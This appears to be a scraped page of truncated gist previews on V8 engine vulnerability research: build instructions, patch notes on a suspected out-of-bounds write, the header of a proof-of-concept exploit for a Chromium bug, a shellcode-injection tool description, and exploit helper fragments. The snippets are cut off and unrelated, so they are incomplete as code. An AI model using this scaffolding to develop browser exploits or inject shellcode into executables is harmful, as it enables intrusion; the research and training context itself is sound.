| // Build d8 using: | |
| // a) Run once | |
| // git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71 | |
| // gclient sync | |
| // gn gen ./out/x64.debug | |
| // gn gen ./out/x64.release | |
| // | |
| // b) | |
| // Debug Build: | |
| // ninja -C ./out/x64.debug d8 |
| // Copyright 2024 the V8 project authors. All rights reserved. | |
| // Use of this source code is governed by a BSD-style license that can be | |
| // found in the LICENSE file. | |
| #include "src/sandbox/external-pointer-table-tracer.h" | |
| #include <iostream> | |
| #include "src/common/globals.h" | |
| #include "src/execution/isolate.h" |
| # Build v8 x64 on modern Linux | |
| # Time to run: about 1.2hrs at 8Gb RAM / 8 cores, Ubuntu 22.04 LTS | |
| # This dockerfile is part of Zero Day Engineering training materials on JavaScript engines internals and vulnerability research | |
| # https://zerodayengineering.com | |
| # @zerodaytraining | |
| FROM ubuntu:bionic | |
| MAINTAINER [email protected] | |
| RUN apt-get update && apt-get upgrade |
Official patch: https://chromium-review.googlesource.com/c/v8/v8/+/4584248
Patch come from KeyedStoreIC::StoreElementHandler(), it returns fast path code(Turbofan builtin) for keyed store depends on "receiver_map" and "store_mode". Based on the content of this function is all about element STORE, I personally believe that this is an OOB writes vulnerability.
If we divide the PoC exploration into two parts based on this func, they are:
| // POC Exploit for v8 issue 1104608 (https://bugs.chromium.org/p/chromium/issues/detail?id=1104608) | |
| // author: @mistymntncop | |
| // bug discovered by: @r3tr0spect2019 | |
| // Exploit strategy based on @r3tr0spect2019's "Real World CTF" presentation on the bug. | |
| // https://www.youtube.com/watch?v=rSaIlBWwxsY | |
| // | |
| // Build d8 using: | |
| // a) Run once | |
| // git checkout 3505cf00eb4c59b87f4b5ec9fc702f7935fdffd0 | |
| // gclient sync --with_branch_heads |
| /* | |
| * PEResourceInject (C# version for x64) by Wra7h | |
| * | |
| * Add a bitmap resource to an executable. Parse the PE header and calculate the address of the shellcode. | |
| * This avoids direct calls to VirtualAllocEx & WriteProcessMemory, but will modify the target exe on disk, | |
| * and this implementation will create a backup of the executable in the same directory with a ".bak" extension. | |
| * | |
| * Compile: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe .\PEResourceInject.cs | |
| * Use: PEResourceInject.exe <C:\Path\to\target\program.exe> <C:\Path\to\shellcode.bin> | |
| * |
In order to be able to build v8 from scratch on Windows for x64, please follow the following steps.
These instructions were updated to work with Windows 11 Build 10.0.22621, but this should also work on WInodws 10
NOTE: While the Chrome team does provide decent documentation, there are some nuances and other additional steps that must be done for v8 to compile on Windows.
Documentation:
| # 1. Download and install go | |
| https://golang.org/doc/install | |
| # 2. Download and install VMware workstation player | |
| https://www.vmware.com/products/workstation-player.html | |
| # 3. Download and install vagrant | |
| https://www.vagrantup.com/downloads | |
| # 4. Download vagrant vmware utility |
| class Helpers { | |
| constructor() { | |
| this.buf = new ArrayBuffer(8); | |
| this.f64 = new Float64Array(this.buf); | |
| this.f32 = new Float32Array(this.buf); | |
| this.u32 = new Uint32Array(this.buf); | |
| this.u64 = new BigUint64Array(this.buf); | |
| this.state = {}; | |
| } |
let wasm_code = new Uint8Array([
0, 97,115,109, 1, 0, 0, 0, 1,133,128,128,128, 0,
1, 96, 0, 1,127, 3,130,128,128,128, 0, 1, 0, 4,
132,128,128,128, 0, 1,112, 0, 0, 5,131,128,128,128,
0, 1, 0, 1, 6,129,128,128,128, 0, 0, 7,145,128,
128,128, 0,2,6,109,101,109,111,114,121,2,0,4,109,97,
105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,
0,65,42,11